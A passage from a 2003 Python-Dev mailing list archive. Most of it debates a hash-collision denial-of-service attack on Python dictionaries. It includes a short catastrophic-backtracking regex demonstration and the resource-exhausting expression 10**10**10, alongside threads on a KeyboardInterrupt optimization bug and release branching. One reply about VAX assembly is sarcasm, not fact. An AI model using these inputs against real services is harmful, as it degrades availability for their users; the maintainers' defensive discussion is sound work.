  File "/mnt/home/guido/projects/trunk/Lib/test/test_ossaudiodev.py", line 58, in play_sound_file
    dsp.write(data)
KeyboardInterrupt

--Guido van Rossum (home page: http://www.python.org/~guido/)


From tim@zope.com  Thu May 29 23:31:56 2003
From: tim@zope.com (Tim Peters)
Date: Thu, 29 May 2003 18:31:56 -0400
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <oyd1xyhbgsz.fsf@bert.cs.rice.edu>
Message-ID: <BIEJKCLHCIOIHAGOKOLHIEIAFMAA.tim@zope.com>

[Jeremy Hylton]
>> I just took a minute to look at this.  I downloaded the python-attack
>> file from your Web site.  I loaded all the strings and then inserted
>> them into a dictionary.  I also generated a list of 10,000 random
>> strings and inserted them into a dictionary.

[Scott Crosby]
> Ok. It should have taken almost a minute instead of .08 seconds in the
> attack version.  My file is broken. I'll be constructing a new one
> later this evening.  If you test perl with the perl files, you'll see
> what should have occurred in this case.

Note that the 10,000 strings in the file map to 400 distinct 32-bit hash
codes under Python's hash.  It's not enough to provoke worst-case behavior
in Python just to collide on the low-order bits:  all 32 bits contribute to
the probe sequence (just colliding on the initial bucket slot doesn't have
much effect).  As is, it's effectively creating 400 collision chains,
ranging in length from 7 to 252, with a mean length of 25 and a median of
16.
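
For anyone who wants to reproduce that kind of tally, a few lines of
Python do it (the file name below is just a placeholder for wherever the
attack strings were saved):

# Group the strings by their hash() code and look at the chain lengths.
chains = {}
for line in open("python-attack"):
    s = line.strip()
    chains.setdefault(hash(s), []).append(s)

lengths = [len(c) for c in chains.values()]
lengths.sort()
print "strings:", sum(lengths)
print "distinct hash codes:", len(chains)
print "chain lengths: min %d, max %d" % (lengths[0], lengths[-1])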



From scrosby@cs.rice.edu  Fri May 30 00:29:45 2003
From: scrosby@cs.rice.edu (Scott A Crosby)
Date: 29 May 2003 18:29:45 -0500
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <BIEJKCLHCIOIHAGOKOLHIEIAFMAA.tim@zope.com>
References: <BIEJKCLHCIOIHAGOKOLHIEIAFMAA.tim@zope.com>
Message-ID: <oydel2hbac6.fsf@bert.cs.rice.edu>

On Thu, 29 May 2003 18:31:56 -0400, "Tim Peters" <tim@zope.com> writes:

> [Jeremy Hylton]
> >> I just took a minute to look at this.  I downloaded the python-attack
> >> file from your Web site.  I loaded all the strings and then inserted
> >> them into a dictionary.  I also generated a list of 10,000 random
> >> strings and inserted them into a dictionary.
> 
> [Scott Crosby]
> > Ok. It should have taken almost a minute instead of .08 seconds in the
> > attack version.  My file is broken. I'll be constructing a new one
> > later this evening.  If you test perl with the perl files, you'll see
> > what should have occurred in this case.
> 
> Note that the 10,000 strings in the file map to 400 distinct 32-bit hash
> codes under Python's hash.  It's not enough to provoke worst-case behavior

Yes. Jeremy has made me aware of this. I appear to have made a
mistake when inserting python's hash code into my program that finds
generators. The fact that I find so many collisions, but don't have
everything colliding, indicates what the problem is.

> in Python just to collide on the low-order bits:  all 32 bits contribute to
> the probe sequence (just colliding on the initial bucket slot doesn't have
> much effect).

Correct. My program, as per the paper, generates full 32 bit hash
collisions. It doesn't generate bucket collisions.

> As is, it's effectively creating 400 collision chains, ranging in
> length from 7 to 252, with a mean length of 25 and a median of 16.

Yes. I don't know python so I had no test program to verify that my
attack file was correct. It's not. Now that I have one, I'll quash the
bug and release a new file later this evening.

Scott


From tim.one@comcast.net  Fri May 30 02:54:20 2003
From: tim.one@comcast.net (Tim Peters)
Date: Thu, 29 May 2003 21:54:20 -0400
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <oydptm1biif.fsf@bert.cs.rice.edu>
Message-ID: <LNBBLJKPBEHFEDALKOLCKEDGEIAB.tim.one@comcast.net>

I've got one meta-comment here:

[Scott A Crosby]
> Hello. We have analyzed this software to determine its vulnerability
> to a new class of DoS attacks related to a recent paper, ''Denial
> of Service via Algorithmic Complexity Attacks.''

I don't think this is new.  For example, a much simpler kind of attack is to
exploit the way backtracking regexp engines work -- it's easy to find regexp
+ target_string combos that take time exponential in the sum of the lengths
of the input strings.  It's not so easy to recognize such a pair when it's
handed to you.  In Python, exploiting unbounded-int arithmetic is another
way to soak up eons of CPU with few characters, e.g.

    10**10**10

will suck up all your CPU *and* all your RAM.  Another easy way is to study
a system's C qsort() implementation, and provoke it into quadratic-time
behavior (BTW, McIlroy wrote a cool paper on this in '98:

    http://www.cs.dartmouth.edu/~doug/mdmspe.pdf
).
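
To make the regexp point concrete, here's a tiny example of the kind of
combo meant above (timings vary wildly by machine and engine, and grow
roughly by a factor of two per extra 'a'):

import re, time

# Nested quantifiers let the backtracking engine try exponentially many ways
# of splitting the run of 'a's before concluding there is no match.
pattern = re.compile(r'(a+)+b')
victim = 'a' * 24 + 'c'          # no 'b' anywhere, so every split gets tried

start = time.time()
print pattern.match(victim), "after %.1f seconds" % (time.time() - start)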


I'm uninterested in trying to "do something" about these.  If
resource-hogging is a serious potential problem in some context, then
resource limitation is an operating system's job, and any use of Python (or
Perl, etc) in such a context should be under the watchful eyes of OS
subsystems that track actual resource usage.



From scrosby@cs.rice.edu  Fri May 30 03:19:57 2003
From: scrosby@cs.rice.edu (Scott A Crosby)
Date: 29 May 2003 21:19:57 -0500
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <LNBBLJKPBEHFEDALKOLCKEDGEIAB.tim.one@comcast.net>
References: <LNBBLJKPBEHFEDALKOLCKEDGEIAB.tim.one@comcast.net>
Message-ID: <oydisrtyy42.fsf@bert.cs.rice.edu>

On Thu, 29 May 2003 21:54:20 -0400, Tim Peters <tim.one@comcast.net> writes:

> I've got one meta-comment here:
> 
> [Scott A Crosby]
> > Hello. We have analyzed this software to determine its vulnerability
> > to a new class of DoS attacks related to a recent paper, ''Denial
> > of Service via Algorithmic Complexity Attacks.''
> 
> I don't think this is new.  For example, a much simpler kind of attack is to
> exploit the way backtracking regexp engines work -- it's easy to find regexp
> + target_string combos that take time exponential in the sum of the lengths
> of the input strings.  It's not so easy to recognize such a pair when it's
> handed to you.  In Python, exploiting unbounded-int arithmetic is another
> way to soak up eons of CPU with few characters, e.g.
> 
>     10**10**10
> 

These ways require that I have the ability to feed a program, an
expression, or a regular expression into the victim's python
interpreter.

The attack I discuss only requires that it hash some arbitrary input by
the attacker, so these attacks apply in many more cases.

> will suck up all your CPU *and* all your RAM.  Another easy way is to study
> a system's C qsort() implementation, and provoke it into quadratic-time
> behavior (BTW, McIlroy wrote a cool paper on this in '98:
> 
>     http://www.cs.dartmouth.edu/~doug/mdmspe.pdf

This is a very cool paper in exactly the same vein as ours. Thanks.

> I'm uninterested in trying to "do something" about these.  If
> resource-hogging is a serious potential problem in some context, then
> resource limitation is an operating system's job, and any use of Python (or
> Perl, etc) in such a context should be under the watchful eyes of OS
> subsystems that track actual resource usage.

I disagree. Changing the hash function eliminates these attacks on
hash tables.

Scott



From tim_one@email.msn.com  Fri May 30 04:00:35 2003
From: tim_one@email.msn.com (Tim Peters)
Date: Thu, 29 May 2003 23:00:35 -0400
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <oydisrtyy42.fsf@bert.cs.rice.edu>
Message-ID: <LNBBLJKPBEHFEDALKOLCGEHBELAB.tim_one@email.msn.com>

[Scott A Crosby]
> These ways require me having the ability to feed a program, an
> expression, or a regular expression into the victim's python
> interpreter.

I think you underestimate the perversity of regular expressions in
particular.  Many programs use (fixed) regexps to parse input, and it's
often possible to construct inputs that take horribly long times to match,
or, especially, to fail to match.  Blowing the hardware stack (provoking a
memory fault) is also usually easy.  The art of writing robust regexps for
use with a backtracking engine is obscure and difficult (see Friedl's
"Mastering Regular Expressions" (O'Reilly) for a practical intro to the
topic), and regexps are ubiquitous now.

> The attack I discuss only requires that it hash some arbitrary input by
> the attacker, so these attacks apply in many more cases.

While a regexp attack only requires that the program parse one user-supplied
string <wink>

>>     http://www.cs.dartmouth.edu/~doug/mdmspe.pdf

> This is a very cool paper in exactly the same vein as ours. Thanks.

It is a cool paper, and you're welcome.  I don't think it's in the same
vein, though -- McIlroy presented it as an interesting discovery, not as "a
reason" for people to get agitated about programs using quicksort.  The most
likely reason you didn't find references to it before is because nobody in
real life cares much about this attack possibility.

>> I'm uninterested in trying to "do something" about these.  If
>> resource-hogging is a serious potential problem in some context, then
>> resource limitation is an operating system's job, and any use of
>> Python (or Perl, etc) in such a context should be under the watchful
>> eyes of OS subsystems that track actual resource usage.

> I disagree. Changing the hash function eliminates these attacks on
> hash tables.

It depends on how much access an attacker has, and, as you said before,
you're not aware of any specific application in Python that *can* be
attacked this way.  I'm not either.

In any case, the universe of resource attacks is much larger than just
picking on hash functions, so plugging a hole in those alone wouldn't do
anything to ease my fears -- provided I had such fears, which is admittedly
a stretch <wink>.  If I did have such fears, I'd want the OS to alleviate
them all at once.



From martin@v.loewis.de  Fri May 30 07:37:00 2003
From: martin@v.loewis.de (Martin v. Löwis)
Date: 30 May 2003 08:37:00 +0200
Subject: [Python-Dev] Release question
In-Reply-To: <20030529151421.G1276@localhost.localdomain>
References: <20030529151421.G1276@localhost.localdomain>
Message-ID: <m365ntvt2r.fsf@mira.informatik.hu-berlin.de>

Jack Diederich <jack@performancedrivers.com> writes:

> The PEPs are pretty thorough about how to announce and build
> releases.  My question is about cvs, branching, and feature freezes.
> I joined python-dev after the 2.2 release so I haven't been around
> for a 'round number' release yet.

Notice that PEP 101 *does* talk about CVS branches and tags, for
releases. Branches are not used much for anything else in Python.

> I'm guessing 2.3 is in bugfix only mode.  

Correct; there will be one more beta, release candidates, and a
release.

> When is 2.4 tagged, and what is the timeframe on that? (the linux
> kernel generally waits a while before starting the next dev branch).

This is not how Python works. Immediately after 2.3 is released, 2.4
development starts. Bugs discovered in 2.3 are then fixed both on the
2.3-maint branch and HEAD (if there are any volunteers from the PBF,
those patches may also get applied to the 2.2-maint branch if
applicable).

In Linux, a new "unstable" kernel is usually started with a major
restructuring of everything, so the "unstable" code base diverges
quickly from the previous release. This is not the case for Python -
we still have a lot of code that was in 1.5.

Regards,
Martin


From guido@python.org  Fri May 30 12:39:18 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 30 May 2003 07:39:18 -0400
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: "Your message of 29 May 2003 21:19:57 CDT."
 <oydisrtyy42.fsf@bert.cs.rice.edu>
References: <LNBBLJKPBEHFEDALKOLCKEDGEIAB.tim.one@comcast.net>
 <oydisrtyy42.fsf@bert.cs.rice.edu>
Message-ID: <200305301139.h4UBdIb15112@pcp02138704pcs.reston01.va.comcast.net>

[Tim Peters]
> > I'm uninterested in trying to "do something" about these.  If
> > resource-hogging is a serious potential problem in some context, then
> > resource limitation is an operating system's job, and any use of Python (or
> > Perl, etc) in such a context should be under the watchful eyes of OS
> > subsystems that track actual resource usage.

[Scott Crosby]
> I disagree. Changing the hash function eliminates these attacks on
> hash tables.

At what cost for Python?  99.99% of all Python programs are not
vulnerable to this kind of attack, because they don't take huge
amounts of arbitrary input from an untrusted source.  If the hash
function you propose is even a *teensy* bit slower than the one we've
got now (and from your description I'm sure it has to be), everybody
would be paying for the solution to a problem they don't have.  You
keep insisting that you don't know Python.  Hashing is used an awful
lot in Python -- as an interpreted language, most variable lookups and
all method and instance variable lookups use hashing.  So this would
affect every Python program.

Scott, we thank you for pointing out the issue, but I think you'll be
wearing out your welcome here quickly if you keep insisting that we do
things your way based on the evidence you've produced so far.

--Guido van Rossum (home page: http://www.python.org/~guido/)


From scrosby@cs.rice.edu  Fri May 30 17:18:14 2003
From: scrosby@cs.rice.edu (Scott A Crosby)
Date: 30 May 2003 11:18:14 -0500
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <200305301139.h4UBdIb15112@pcp02138704pcs.reston01.va.comcast.net>
References: <LNBBLJKPBEHFEDALKOLCKEDGEIAB.tim.one@comcast.net>
 <oydisrtyy42.fsf@bert.cs.rice.edu>
 <200305301139.h4UBdIb15112@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <oyd4r3cl86x.fsf@bert.cs.rice.edu>

On Fri, 30 May 2003 07:39:18 -0400, Guido van Rossum <guido@python.org> writes:

> [Tim Peters]
> > > I'm uninterested in trying to "do something" about these.  If
> > > resource-hogging is a serious potential problem in some context, then
> > > resource limitation is an operating system's job, and any use of Python (or
> > > Perl, etc) in such a context should be under the watchful eyes of OS
> > > subsystems that track actual resource usage.
> 
> [Scott Crosby]
> > I disagree. Changing the hash function eliminates these attacks on
> > hash tables.
> 
> At what cost for Python?  99.99% of all Python programs are not
> vulnerable to this kind of attack, because they don't take huge
> amounts of arbitrary input from an untrusted source.  If the hash
> function you propose is even a *teensy* bit slower than the one we've
> got now (and from your description I'm sure it has to be), everybody

We included several benchmarks in our paper:

On here, 
   http://www.cs.rice.edu/~scrosby/hash/CrosbyWallach_UsenixSec2003/CacheEffects2.png

when we compare hash functions as the working set changes, we notice
that a single L2 cache miss far exceeds hashing time for all
algorithms.

On 

   http://www.cs.rice.edu/~scrosby/hash/CrosbyWallach_UsenixSec2003/LengthEffects.png

UHASH exceeds the performance of perl's hash function, which is
simpler than your own.

Even for small strings, UHASH is only about half the speed of perl's
hash function, and your function already performs a multiplication per
byte:

#define HASH(hi,ho,c)    ho = (1000003*hi) ^ c
#define HASH0(ho,c)      ho = ((c << 7)*1000003) ^ c
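
Spelled out as a loop, that's roughly the following (a Python rendering
of the C above, assuming a 32-bit long; the real string_hash also xors
in the length at the end and caches the result, which is omitted here):

def string_hash_sketch(s):
    # Rough Python rendering of the C macros above, masked to 32 bits.
    if not s:
        return 0
    x = (ord(s[0]) << 7) & 0xffffffffL
    for ch in s:
        x = ((1000003 * x) ^ ord(ch)) & 0xffffffffL
    return x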

The difference between this and CW12 is one 32 bit modulo
operation. (Please note that CW12 is currently broken. Fortunately it
didn't affect the benchmarking on x86.)

> would be paying for the solution to a problem they don't have.  You
> keep insisting that you don't know Python.  Hashing is used an awful
> lot in Python -- as an interpreted language, most variable lookups and
> all method and instance variable lookups use hashing.  So this would
> affect every Python program.

Have you done benchmarking to prove that string_hash is in fact an
important hotspot in the python interpreter? If so, and doing one
modulo operation per string is unacceptable, then you may wish to
consider Jenkins' hash. The linux kernel people are switching to using
a keyed variant of Jenkins' hash. However, Jenkins' hash, AFAIK, has no
proof that it is in fact universal. It is, however, probably safe.

It is not unlikely that if you went that route you'd be somewhat
safer, and faster, but if you want full safety, you'd need to go with
a universal hash.

Scott


From jepler@unpythonic.net  Fri May 30 21:00:21 2003
From: jepler@unpythonic.net (Jeff Epler)
Date: Fri, 30 May 2003 15:00:21 -0500
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <oyd4r3cl86x.fsf@bert.cs.rice.edu>
References: <LNBBLJKPBEHFEDALKOLCKEDGEIAB.tim.one@comcast.net> <oydisrtyy42.fsf@bert.cs.rice.edu> <200305301139.h4UBdIb15112@pcp02138704pcs.reston01.va.comcast.net> <oyd4r3cl86x.fsf@bert.cs.rice.edu>
Message-ID: <20030530200021.GB30507@unpythonic.net>

On Fri, May 30, 2003 at 11:18:14AM -0500, Scott A Crosby wrote:
> On 
> 
>    http://www.cs.rice.edu/~scrosby/hash/CrosbyWallach_UsenixSec2003/LengthEffects.png
> 
> UHASH exceeds the performance of perl's hash function, which is
> simpler than your own.

I notice that you say "with strings longer than around 44-bytes,
UHASH dominates all the other hash functions, due in no small part to its
extensive performance tuning and *hand-coded assembly routines.*"
[emphasis mine]  It's all well and good for people who can run your
hand-coded VAX assembly, but when Intel's 80960* comes out and people
start running Unix on it, won't they be forced to code your hash function
all over again?  Since everybody has hopes for Python beyond the VAX
(heck, in 20 years VAX might have as little as 5% of the market --
anything could happen) there has been a conscious decision not to hand-code
anything in assembly in Python.

Jeff
* The Intel 80960, in case you haven't heard of it, is a superscalar
  processor that will require highly-tuned compilers and will run like
  a bat out of hell when the code is tuned right.  I think it's capable
  of one floating-point and two integer instructions per cycle!


From guido@python.org  Fri May 30 21:35:53 2003
From: guido@python.org (Guido van Rossum)
Date: Fri, 30 May 2003 16:35:53 -0400
Subject: [Python-Dev] KeyboardInterrupt on Windows
Message-ID: <200305302035.h4UKZr220087@pcp02138704pcs.reston01.va.comcast.net>

I received this problem report (Kurt is the IDLEFORK developer).  Does
anybody know what could be the matter here?  What changed recently???

--Guido van Rossum (home page: http://www.python.org/~guido/)

------- Forwarded Message

Date:    Fri, 30 May 2003 15:50:15 -0400
From:    kbk@shore.net (Kurt B. Kaiser)
To:      Guido van Rossum <guido@python.org>
Subject: KeyboardInterrupt

I find that

       while 1: pass

doesn't respond to a KeyboardInterrupt on Python2.3b1 on either
WinXP or W2K.  Is this generally known?  I couldn't find any mention 
of it.

      while 1: a = 0 

is fine on 2.3b1, and both work on Python2.2.

- --
KBK

------- End of Forwarded Message



From tim@zope.com  Fri May 30 21:41:03 2003
From: tim@zope.com (Tim Peters)
Date: Fri, 30 May 2003 16:41:03 -0400
Subject: [Python-Dev] KeyboardInterrupt on Windows
In-Reply-To: <200305302035.h4UKZr220087@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <BIEJKCLHCIOIHAGOKOLHAEMJFMAA.tim@zope.com>

[Guido]
> I received this problem report (Kurt is the IDLEFORK developer).  Does
> anybody know what could be the matter here?  What changed recently???

Looks like eval-loop optimizations.  The first version essentially compiles
to a JUMP_ABSOLUTE to itself

        >>   10 JUMP_ABSOLUTE           10

and

		case JUMP_ABSOLUTE:
			JUMPTO(oparg);
			goto fast_next_opcode;

This skips the ticker checks, so never checks for interrupts.  As usual, I
expect we can blame Raymond Hettinger's good intentions <wink>.

> ------- Forwarded Message
>
> Date:    Fri, 30 May 2003 15:50:15 -0400
> From:    kbk@shore.net (Kurt B. Kaiser)
> To:      Guido van Rossum <guido@python.org>
> Subject: KeyboardInterrupt
>
> I find that
>
>        while 1: pass
>
> doesn't respond to a KeyboardInterrupt on Python2.3b1 on either
> WinXP or W2K.  Is this generally known?  I couldn't find any mention
> of it.
>
>       while 1: a = 0
>
> is fine on 2.3b1, and both work on Python2.2.
>
> - --
> KBK
>
> ------- End of Forwarded Message



From neal@metaslash.com  Fri May 30 21:40:01 2003
From: neal@metaslash.com (Neal Norwitz)
Date: Fri, 30 May 2003 16:40:01 -0400
Subject: [Python-Dev] KeyboardInterrupt on Windows
In-Reply-To: <200305302035.h4UKZr220087@pcp02138704pcs.reston01.va.comcast.net>
References: <200305302035.h4UKZr220087@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <20030530204000.GH27502@epoch.metaslash.com>

On Fri, May 30, 2003 at 04:35:53PM -0400, Guido van Rossum wrote:
> I received this problem report (Kurt is the IDLEFORK developer).  Does
> anybody know what could be the matter here?  What changed recently???

>        while 1: pass
> 
> doesn't respond to a KeyboardInterrupt on Python2.3b1 on either
> WinXP or W2K.

Could this be from the optimization Raymond did:

>>> def f():
...  while 1: pass


>>> dis.dis(f)
  2           0 SETUP_LOOP              12 (to 15)
              3 JUMP_FORWARD             4 (to 10)
              6 JUMP_IF_FALSE            4 (to 13)
              9 POP_TOP
        >>   10 JUMP_ABSOLUTE           10
        >>   13 POP_TOP
             14 POP_BLOCK
        >>   15 LOAD_CONST               0 (None)
             18 RETURN_VALUE

3 jumps to 10, 10 jumps to itself unless I'm reading this wrong.

See Python/compile.c::optimize_code (starting around line 339)

Neal


From jeremy@zope.com  Fri May 30 21:43:28 2003
From: jeremy@zope.com (Jeremy Hylton)
Date: 30 May 2003 16:43:28 -0400
Subject: [Python-Dev] KeyboardInterrupt on Windows
In-Reply-To: <200305302035.h4UKZr220087@pcp02138704pcs.reston01.va.comcast.net>
References: <200305302035.h4UKZr220087@pcp02138704pcs.reston01.va.comcast.net>
Message-ID: <1054327408.2917.9.camel@slothrop.zope.com>

It's probably an unintended consequence of the "while 1" optimization
and the fast-next-opcode optimization.  "while 1" doesn't do a test at
runtime anymore.  And opcodes like JUMP_ABSOLUTE bypass the test for
pending exceptions.  The net result is that while 1: pass puts the
interpreter in a tight loop doing a JUMP_ABSOLUTE that goes nowhere. 
That is, offset X has JUMP_ABSOLUTE X.

I'd be inclined to call this a bug, but I'm not sure how to fix it.

Jeremy




From neal@metaslash.com  Fri May 30 22:04:30 2003
From: neal@metaslash.com (Neal Norwitz)
Date: Fri, 30 May 2003 17:04:30 -0400
Subject: [Python-Dev] KeyboardInterrupt on Windows
In-Reply-To: <20030530204000.GH27502@epoch.metaslash.com>
References: <200305302035.h4UKZr220087@pcp02138704pcs.reston01.va.comcast.net>
 <20030530204000.GH27502@epoch.metaslash.com>
Message-ID: <20030530210430.GI27502@epoch.metaslash.com>

On Fri, May 30, 2003 at 04:40:00PM -0400, Neal Norwitz wrote:
> On Fri, May 30, 2003 at 04:35:53PM -0400, Guido van Rossum wrote:
> > I received this problem report (Kurt is the IDLEFORK developer).  Does
> > anybody know what could be the matter here?  What changed recently???
> 
> >        while 1: pass
> > 
> > doesn't respond to a KeyboardInterrupt on Python2.3b1 on either
> > WinXP or W2K.

The patch below fixes the problem by not optimizing while 1:pass.  
Seems kinda hacky though.

Neal
--

Index: Python/compile.c
===================================================================
RCS file: /cvsroot/python/python/dist/src/Python/compile.c,v
retrieving revision 2.289
diff -w -u -r2.289 compile.c
--- Python/compile.c    22 May 2003 22:00:04 -0000      2.289
+++ Python/compile.c    30 May 2003 21:02:26 -0000
@@ -411,6 +411,8 @@
                                tgttgt -= i + 3;     /* Calc relative jump addr */
                        if (tgttgt < 0)           /* No backward relative jumps */
                                 continue;
+                       if (i == tgttgt && opcode == JUMP_ABSOLUTE)
+                               goto exitUnchanged;
                        codestr[i] = opcode;
                        SETARG(codestr, i, tgttgt);
                        break;


From barry@python.org  Fri May 30 22:09:27 2003
From: barry@python.org (Barry Warsaw)
Date: 30 May 2003 17:09:27 -0400
Subject: [Python-Dev] I'm tagging the Python 2.2.3 tree
Message-ID: <1054328967.13804.33.camel@geddy>

No more changes please.
-Barry




From mwh@python.net  Fri May 30 22:22:32 2003
From: mwh@python.net (Michael Hudson)
Date: Fri, 30 May 2003 22:22:32 +0100
Subject: [Python-Dev] KeyboardInterrupt on Windows
In-Reply-To: <1054327408.2917.9.camel@slothrop.zope.com> (Jeremy Hylton's
 message of "30 May 2003 16:43:28 -0400")
References: <200305302035.h4UKZr220087@pcp02138704pcs.reston01.va.comcast.net>
 <1054327408.2917.9.camel@slothrop.zope.com>
Message-ID: <2mvfvsf7tz.fsf@starship.python.net>

Jeremy Hylton <jeremy@zope.com> writes:

> It's probably an unintended consequence of the "while 1" optimization
> and the fast-next-opcode optimization.  "while 1" doesn't do a test at
> runtime anymore.  And opcodes like JUMP_ABSOLUTE bypass the test for
> pending exceptions.  The net result is that while 1: pass puts the
> interpreter in a tight loop doing a JUMP_ABSOLUTE that goes nowhere. 
> That is, offset X has JUMP_ABSOLUTE X.
>
> I'd be inclined to call this a bug, but I'm not sure how to fix it.

Take out the while 1: optimizations?  I don't want to belittle
Raymond's efforts, but I am conscious of[1] Tim's repeated
observations of the correlation between the number of optimizations in
the compiler and the number of weird bugs therein.

Cheers,
M.

[1] I'm also warming up for a end-of-PyPy-sprint drunken hacking
    session so you probably shouldn't take me too seriously :-)

-- 
  ARTHUR:  Why should a rock hum?
    FORD:  Maybe it feels good about being a rock.
                    -- The Hitch-Hikers Guide to the Galaxy, Episode 8


From python@rcn.com  Fri May 30 22:23:47 2003
From: python@rcn.com (Raymond Hettinger)
Date: Fri, 30 May 2003 17:23:47 -0400
Subject: [Python-Dev] KeyboardInterrupt on Windows
References: <200305302035.h4UKZr220087@pcp02138704pcs.reston01.va.comcast.net> <20030530204000.GH27502@epoch.metaslash.com> <20030530210430.GI27502@epoch.metaslash.com>
Message-ID: <004401c326f1$c2391300$125ffea9@oemcomputer>

> On Fri, May 30, 2003 at 04:40:00PM -0400, Neal Norwitz wrote:
> > On Fri, May 30, 2003 at 04:35:53PM -0400, Guido van Rossum wrote:
> > > I received this problem report (Kurt is the IDLEFORK developer).  Does
> > > anybody know what could be the matter here?  What changed recently???
> > 
> > >        while 1: pass
> > > 
> > > doesn't respond to a KeyboardInterrupt on Python2.3b1 on either
> > > WinXP or W2K.
> 
> The patch below fixes the problem by not optimizing while 1:pass.  

That looks like a good fix to me. 

There are two other ways:
*   disable the goto fast_next_opcode for JUMP_ABSOLUTE
*   disable the bytecode optimization for a jump-to-a-jump


Raymond


From scrosby@cs.rice.edu  Fri May 30 23:02:51 2003
From: scrosby@cs.rice.edu (Scott A Crosby)
Date: 30 May 2003 17:02:51 -0500
Subject: [Python-Dev] Algoritmic Complexity Attack on Python
In-Reply-To: <20030530200021.GB30507@unpythonic.net>
References: <LNBBLJKPBEHFEDALKOLCKEDGEIAB.tim.one@comcast.net>
 <oydisrtyy42.fsf@bert.cs.rice.edu>
 <200305301139.h4UBdIb15112@pcp02138704pcs.reston01.va.comcast.net>
 <oyd4r3cl86x.fsf@bert.cs.rice.edu>
 <20030530200021.GB30507@unpythonic.net>
Message-ID: <oydwug814ac.fsf@bert.cs.rice.edu>

On Fri, 30 May 2003 15:00:21 -0500, Jeff Epler <jepler@unpythonic.net> writes:

> On Fri, May 30, 2003 at 11:18:14AM -0500, Scott A Crosby wrote:
> > On 
> > 
> >    http://www.cs.rice.edu/~scrosby/hash/CrosbyWallach_UsenixSec2003/LengthEffects.png
> > 
> > UHASH exceeds the performance of perl's hash function, which is
> > simpler than your own.
> 
> I notice that you say "with strings longer than around 44-bytes,
> UHASH dominates all the other hash functions, due in no small part to its
> extensive performance tuning and *hand-coded assembly routines.*"
> [emphasis mine]  It's all well and good for people who can run your

We benchmarked it, and without assembly optimizations, uhash still
exceeds perl's. Also please note that we did not create uhash. We merely
used it as a high-performance universal hash which we could cite and
benchmark.

Freshly computed raw benchmarks on a P2-450 are at the end of this
email. Looking at them now, I think we may have slightly erred and
used the non-assembly version of the hash in constructing the graphs,
because the crossover point compared to perl looks to be about 20
bytes with assembly, and about 48 without.

Roughly, they show that uhash is about half the speed on a P2-450
without assembly. I do not have benchmarks on other platforms to
compare it to. However, CW is known to be about 10 times worse,
relatively, than Jenkins' on a SPARC.

The python community will have to judge whether the performance
difference of the current hash is worth the risk of the attack.

Also, I'd like to thank Tim Peters for telling me about the potential
of degradation that regular expressions may offer.

Scott



Time benchmarking actual hash (including benchmarking overhead) with a
working set size of 12kb.

Time(perl-5.8.0): 12.787 Mbytes/sec with string length 4, buf 12000
Time(uh_cw-1024): 6.010 Mbytes/sec with string length 4, buf 12000
Time(python): 14.952 Mbytes/sec with string length 4, buf 12000
Time(test32out_uhash): 4.584 Mbytes/sec with string length 4, buf 12000
Time(test32out_assembly_uhash): 6.014 Mbytes/sec with string length 4, buf 12000

Time(perl-5.8.0): 29.125 Mbytes/sec with string length 16, buf 12000
Time(uh_cw-1024): 11.898 Mbytes/sec with string length 16, buf 12000
Time(python): 36.445 Mbytes/sec with string length 16, buf 12000
Time(test32out_uhash): 19.169 Mbytes/sec with string length 16, buf 12000
Time(test32out_assembly_uhash): 25.660 Mbytes/sec with string length 16, buf 12000

Time(perl-5.8.0): 45.440 Mbytes/sec with string length 64, buf 12000
Time(uh_cw-1024): 16.168 Mbytes/sec with string length 64, buf 12000
Time(python): 62.213 Mbytes/sec with string length 64, buf 12000
Time(test32out_uhash): 71.396 Mbytes/sec with string length 64, buf 12000
Time(test32out_assembly_uhash): 106.873 Mbytes/sec with string length 64, buf 12000

Time benchmarking actual hash (Including benchmarking overhead) with a
working set size of 6mb.

Time(perl-5.8.0): 8.099 Mbytes/sec with string length 4, buf 6000000
Time(uh_cw-1024): 4.660 Mbytes/sec with string length 4, buf 6000000
Time(python): 8.840 Mbytes/sec with string length 4, buf 6000000
Time(test32out_uhash): 3.932 Mbytes/sec with string length 4, buf 6000000
Time(test32out_assembly_uhash): 4.859 Mbytes/sec with string length 4, buf 6000000

Time(perl-5.8.0): 20.878 Mbytes/sec with string length 16, buf 6000000
Time(uh_cw-1024): 9.964 Mbytes/sec with string length 16, buf 6000000
Time(python): 24.450 Mbytes/sec with string length 16, buf 6000000
Time(test32out_uhash): 16.168 Mbytes/sec with string length 16, buf 6000000
Time(test32out_assembly_uhash): 19.929 Mbytes/sec with string length 16, buf 6000000

Time(perl-5.8.0): 35.265 Mbytes/sec with string length 64, buf 6000000
Time(uh_cw-1024): 14.400 Mbytes/sec with string length 64, buf 6000000
Time(python): 46.650 Mbytes/sec with string length 64, buf 6000000
Time(test32out_uhash): 48.719 Mbytes/sec with string length 64, buf 6000000
Time(test32out_assembly_uhash): 63.523 Mbytes/sec with string length 64, buf 6000000



From nas@python.ca  Fri May 30 23:22:04 2003
From: nas@python.ca (Neil Schemenauer)
Date: Fri, 30 May 2003 15:22:04 -0700
Subject: [Python-Dev] KeyboardInterrupt on Windows
In-Reply-To: <1054327408.2917.9.camel@slothrop.zope.com>
References: <200305302035.h4UKZr220087@pcp02138704pcs.reston01.va.comcast.net> <1054327408.2917.9.camel@slothrop.zope.com>
Message-ID: <20030530222204.GB404@glacier.arctrix.com>

Jeremy Hylton wrote:
> I'd be inclined to call this a bug, but I'm not sure how to fix it.

I think the right fix is to make JUMP_ABSOLUTE not bypass the test for
pending exceptions.  We have to be really careful with using
fast_next_opcode.  Originally it was only used by SET_LINENO, LOAD_FAST,
LOAD_CONST, STORE_FAST, POP_TOP.  Using it from jump opcodes is asking
for trouble, IMHO.

Shall I prepare a patch?

  Neil


From python@rcn.com  Fri May 30 23:29:50 2003
From: python@rcn.com (Raymond Hettinger)
Date: Fri, 30 May 2003 18:29:50 -0400
Subject: [Python-Dev] KeyboardInterrupt on Windows
